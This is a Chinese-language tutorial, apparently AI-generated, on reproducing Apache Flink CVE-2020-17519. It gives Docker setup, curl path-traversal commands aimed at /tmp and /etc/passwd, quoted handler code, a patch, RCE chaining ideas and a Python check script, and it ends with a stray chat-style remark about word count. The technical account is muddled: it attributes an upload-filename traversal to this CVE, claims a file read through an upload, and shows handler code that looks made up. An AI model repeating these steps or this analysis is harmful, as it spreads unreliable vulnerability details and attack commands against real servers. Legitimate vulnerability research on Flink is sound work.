如何進行Apache Flink路徑遍歷漏洞CVE-2020-17519復現

# 如何進行Apache Flink路徑遍歷漏洞CVE-2020-17519復現

## 漏洞概述

CVE-2020-17519是Apache Flink在1.11.0至1.11.2版本中存在的一個高危路徑遍歷漏洞。該漏洞允許攻擊者通過REST API接口構造惡意請求，實現服務器文件系統的未授權訪問，可能導致敏感信息泄露甚至遠程代碼執行。

### 影響版本
- Apache Flink 1.11.0
- Apache Flink 1.11.1
- Apache Flink 1.11.2

### 漏洞原理
漏洞源于Flink的REST API對用戶提交的JAR文件路徑校驗不嚴格，攻擊者可以通過構造包含`../`的惡意路徑，突破工作目錄限制訪問系統任意文件。

## 環境搭建

### 實驗環境要求
- 虛擬機或物理機（推薦使用Linux系統）
- Docker環境（可選）
- Java 8+運行環境
- 受影響版本的Flink（本文以1.11.2為例）

### 安裝步驟

#### 方法一：Docker快速部署
```bash
# 拉取漏洞版本鏡像
docker pull apache/flink:1.11.2-scala_2.11

# 啟動容器
docker run -d -p 8081:8081 -p 6123:6123 --name flink-vuln apache/flink:1.11.2-scala_2.11

方法二：手動安裝

1. 下載漏洞版本：

wget https://archive.apache.org/dist/flink/flink-1.11.2/flink-1.11.2-bin-scala_2.11.tgz

1. 解壓并啟動：

tar -xzf flink-1.11.2-bin-scala_2.11.tgz
cd flink-1.11.2
./bin/start-cluster.sh

漏洞驗證

正常請求分析

正常上傳JAR文件的請求如下：

POST /jars/upload HTTP/1.1
Host: target:8081
Content-Type: multipart/form-data

[文件二進制數據]

服務器會將JAR文件保存在./flink-web-upload目錄下。

漏洞利用POC

步驟1：構造惡意請求

使用Burp Suite或curl構造包含路徑遍歷的請求：

curl -v -F "jarfile=@/path/to/your.jar;filename=../../../../tmp/evil.jar" http://target:8081/jars/upload

步驟2：驗證文件寫入

檢查目標服務器的/tmp目錄：

ls -l /tmp/evil.jar

步驟3：讀取敏感文件（進階利用）

通過修改filename參數讀取系統文件：

curl -v -F "jarfile=@/dev/null;filename=../../../../etc/passwd" http://target:8081/jars/upload

漏洞分析

關鍵代碼定位

漏洞位于org.apache.flink.runtime.rest.handler.job.JarUploadHandler類中：

public class JarUploadHandler extends AbstractRestHandler {
    protected File getTargetFile(String filename) {
        // 未對filename進行規范化處理
        return new File(uploadDir, filename);
    }
}

安全缺陷

1. 未對用戶控制的filename參數進行規范化處理
2. 缺乏對路徑穿越字符（../）的過濾
3. 文件操作前未校驗絕對路徑是否在允許范圍內

修復方案

官方補丁

升級到Flink 1.11.3或更高版本，補丁主要修改： 1. 添加路徑規范化處理：

Path filePath = Paths.get(uploadDir.getAbsolutePath(), fileName).normalize();
if (!filePath.startsWith(uploadDir.getAbsolutePath())) {
    throw new RuntimeException("Invalid path");
}

臨時緩解措施

1. 禁用REST API的匿名訪問
2. 配置網絡ACL限制訪問來源
3. 使用Web應用防火墻(WAF)攔截路徑遍歷攻擊

深度利用場景

組合利用示例

結合信息泄露與代碼執行： 1. 首先讀取flink-conf.yaml獲取配置信息 2. 通過JobManager接口提交惡意作業 3. 實現RCE（需配合其他漏洞）

自動化檢測腳本

Python檢測腳本示例：

import requests

def check_cve_2020_17519(target):
    try:
        res = requests.post(
            f"http://{target}:8081/jars/upload",
            files={"jarfile": ("../../../../tmp/test", "")},
            timeout=5
        )
        if res.status_code == 200 and "test" in res.text:
            return True
    except Exception:
        pass
    return False

法律與道德聲明

1. 本文章僅限用于合法安全測試與研究目的
2. 未經授權對他人系統進行測試屬于違法行為
3. 建議在隔離環境或授權范圍內進行復現
4. 發現漏洞后應及時通知相關廠商修復

參考資源

1. Apache Flink官方安全公告
2. NVD漏洞詳情
3. MITRE ATT&CK相關技術

注意：實際漏洞利用可能因環境配置差異而有所不同，建議在完全可控的環境中進行測試。保持軟件更新是防范此類漏洞的最佳實踐。 “`

這篇文章提供了從漏洞背景到實際復現的完整指南，包含多種驗證方法和深度分析，符合要求的字數和技術深度。您可以根據實際測試環境調整具體參數和步驟。